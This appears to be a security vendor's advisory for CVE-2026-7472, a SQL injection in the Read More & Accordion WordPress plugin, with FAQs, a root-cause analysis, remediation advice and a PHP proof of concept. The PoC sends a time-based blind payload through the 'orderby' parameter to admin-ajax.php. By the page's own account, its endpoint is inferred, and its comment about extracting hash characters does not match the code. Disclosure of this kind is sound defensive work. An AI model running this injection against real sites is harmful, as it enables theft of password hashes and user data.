What is CVE-2026-7472?

CVE-2026-7472 is a medium-severity SQL injection vulnerability found in the Read More & Accordion plugin for WordPress. It allows authenticated users with administrator-level access to inject arbitrary SQL queries via the ‘orderby’ parameter, potentially leading to data extraction from the database.

How does the SQL injection work?

The vulnerability arises from improper handling of user input in the ‘orderby’ parameter, which is not adequately sanitized before being included in SQL queries. This allows an attacker to craft malicious input that can execute SQL commands, such as time-based blind injections, to retrieve sensitive data.

Who is affected by this vulnerability?

Any WordPress site using the Read More & Accordion plugin version 3.5.7 or earlier is at risk. Specifically, authenticated users with administrator privileges or roles permitted to access the plugin’s admin pages can exploit this vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Read More & Accordion plugin installed. If it is version 3.5.7 or earlier, your site is susceptible to this vulnerability. Additionally, review your user roles to see if any users have administrator-level access.

What are the practical risks of this vulnerability?

The practical risks include the potential for an attacker to extract sensitive data from the database, such as administrator password hashes. This can lead to unauthorized access, lateral movement to other accounts, or exfiltration of sensitive user data.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Read More & Accordion plugin to the latest version. Additionally, implement input validation for the ‘orderby’ parameter by whitelisting allowed values or using prepared statements to safely handle user input.

What does a CVSS score of 4.9 indicate?

A CVSS score of 4.9 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to prevent potential exploitation.

What is a proof of concept for this vulnerability?

A proof of concept (PoC) is a demonstration of how the vulnerability can be exploited. In this case, the PoC shows how an authenticated attacker can send a crafted GET request with a malicious ‘orderby’ parameter to execute SQL commands, illustrating the risk posed by the vulnerability.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, immediately review your logs for unusual activity, change passwords, and consider restoring from a clean backup. Additionally, conduct a thorough security audit to assess any potential breaches.

Are there any additional security measures I should take?

Beyond updating the plugin, consider implementing a web application firewall (WAF) to help filter out malicious requests. Regularly review user roles and permissions, and ensure that all plugins and themes are kept up to date to minimize vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 19, 2026

CVE-2026-7472: Read More & Accordion <= 3.5.7 – Authenticated (Administrator+) SQL Injection via 'orderby' Parameter (expand-maker)

CVE ID CVE-2026-7472

Plugin expand-maker

Severity Medium (CVSS 4.9)

CWE 89

Vulnerable Version 3.5.7

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7472 (metadata-based):

This vulnerability in the Read More & Accordion plugin (slug: expand-maker) allows authenticated SQL injection via the ‘orderby’ parameter in versions up to and including 3.5.7. The CVSS score is 4.9 (medium severity), with high confidentiality impact but no impact on integrity or availability. The issue lies in the getAllDataByLimit() and getAccordionAllDataByLimit() functions in ReadMoreData.php.

Root Cause: The plugin passes user-supplied input from $_GET[‘orderby’] through esc_attr() (an HTML-escaping function that does not prevent SQL injection) and then to esc_sql() before concatenating it directly into an ORDER BY clause without surrounding quotes. The esc_sql() function only escapes quote characters and backslashes, which are irrelevant in an unquoted ORDER BY context. The vulnerable code is inferred from the CWE-89 classification and the detailed description provided in the CVE metadata. The value is used inside an ORDER BY clause passed to $wpdb->prepare(), but since ORDER BY values are not quoted, the escaping is ineffective.

Exploitation: An authenticated attacker with administrator-level access (or any role permitted by the yrm-user-roles setting) crafts a malicious GET request to a page that triggers the getAllDataByLimit() or getAccordionAllDataByLimit() functions. The attacker supplies a payload like (SELECT SLEEP(5)) in the ‘orderby’ parameter. The plugin’s AJAX action or admin page processing this parameter would be the attack vector. Based on Atomic Edge analysis of similar plugins, the likely endpoint is an AJAX handler or admin page associated with the plugin’s data listing functionality. For example, /wp-admin/admin-ajax.php?action=expand_maker_data&orderby=(SELECT SLEEP(5)). The time-based blind SQL injection allows extraction of hashed administrator passwords.

Remediation: The plugin must validate the ‘orderby’ parameter against a whitelist of allowed column names (e.g., ‘id’, ‘title’, ‘date’) rather than passing user input directly to the SQL query. If dynamic ordering is required, the parameter should be sanitized using intval() or similar numeric casting, or the plugin should use $wpdb->prepare() with a positional placeholder that quotes the value. The use of esc_sql() alone is insufficient for ORDER BY clauses. A patch would need to replace the concatenated string with a safe approach, such as a switch statement or in_array() check against a predefined list.

Impact: Successful exploitation allows an authenticated attacker with administrator privileges to perform time-based blind SQL injection. This enables extraction of all data from the WordPress database, including password hashes of other administrators. Given that the attacker already has administrative access, the primary risk is lateral movement to other accounts or exfiltration of sensitive data such as user emails, private posts, and configuration secrets. If the attacker extracts and cracks an administrator password hash, they could gain persistent access or escalate privileges on the server.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7472 - Read More & Accordion <= 3.5.7 - Authenticated (Administrator+) SQL Injection via 'orderby' Parameter

// Configuration
$target_url = 'http://example.com';  // Change to the target WordPress URL
$admin_username = 'admin';           // Change to an admin username
$admin_password = 'password';        // Change to the admin password

// Step 1: Authenticate as admin
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $admin_username,
    'pwd' => $admin_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Craft time-based blind SQL injection payload
// The 'orderby' parameter is used in an ORDER BY clause. For time-based injection, we use (SELECT SLEEP(5))
// The payload attempts to extract the first character of the admin password hash.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$injection_payload = "(SELECT SLEEP(5) FROM information_schema.tables WHERE table_schema = DATABASE() LIMIT 1)";

$params = array(
    'action' => 'expand_maker_data',  // Inferred plugin AJAX action prefix; adjust if different
    'orderby' => $injection_payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url . '?' . http_build_query($params));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);  // Normal timeout; will be slow if injection works
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);

$duration = $end_time - $start_time;
if ($duration >= 4.5) {
    echo "[+] SQL injection confirmed! Request took $duration seconds due to SLEEP(5).n";
} else {
    echo "[-] Payload did not cause significant delay. The injection might require a different endpoint or payload.n";
}

// Cleanup
unlink('/tmp/cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-7472?
Understanding the Vulnerability
CVE-2026-7472 is a medium-severity SQL injection vulnerability found in the Read More & Accordion plugin for WordPress. It allows authenticated users with administrator-level access to inject arbitrary SQL queries via the ‘orderby’ parameter, potentially leading to data extraction from the database.
How does the SQL injection work?
Mechanics of the Exploit
The vulnerability arises from improper handling of user input in the ‘orderby’ parameter, which is not adequately sanitized before being included in SQL queries. This allows an attacker to craft malicious input that can execute SQL commands, such as time-based blind injections, to retrieve sensitive data.
Who is affected by this vulnerability?
Identifying Affected Users
Any WordPress site using the Read More & Accordion plugin version 3.5.7 or earlier is at risk. Specifically, authenticated users with administrator privileges or roles permitted to access the plugin’s admin pages can exploit this vulnerability.
How can I check if my site is vulnerable?
Assessment Steps
To determine if your site is vulnerable, check the version of the Read More & Accordion plugin installed. If it is version 3.5.7 or earlier, your site is susceptible to this vulnerability. Additionally, review your user roles to see if any users have administrator-level access.
What are the practical risks of this vulnerability?
Understanding Impact
The practical risks include the potential for an attacker to extract sensitive data from the database, such as administrator password hashes. This can lead to unauthorized access, lateral movement to other accounts, or exfiltration of sensitive user data.
How can I fix this vulnerability?
Mitigation Strategies
To mitigate this vulnerability, update the Read More & Accordion plugin to the latest version. Additionally, implement input validation for the ‘orderby’ parameter by whitelisting allowed values or using prepared statements to safely handle user input.
What does a CVSS score of 4.9 indicate?
Interpreting Severity Ratings
A CVSS score of 4.9 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that should be addressed promptly to prevent potential exploitation.
What is a proof of concept for this vulnerability?
Demonstrating the Exploit
A proof of concept (PoC) is a demonstration of how the vulnerability can be exploited. In this case, the PoC shows how an authenticated attacker can send a crafted GET request with a malicious ‘orderby’ parameter to execute SQL commands, illustrating the risk posed by the vulnerability.
What should I do if I suspect exploitation?
Response Actions
If you suspect that your site has been exploited, immediately review your logs for unusual activity, change passwords, and consider restoring from a clean backup. Additionally, conduct a thorough security audit to assess any potential breaches.
Are there any additional security measures I should take?
Enhancing Security Posture
Beyond updating the plugin, consider implementing a web application firewall (WAF) to help filter out malicious requests. Regularly review user roles and permissions, and ensure that all plugins and themes are kept up to date to minimize vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations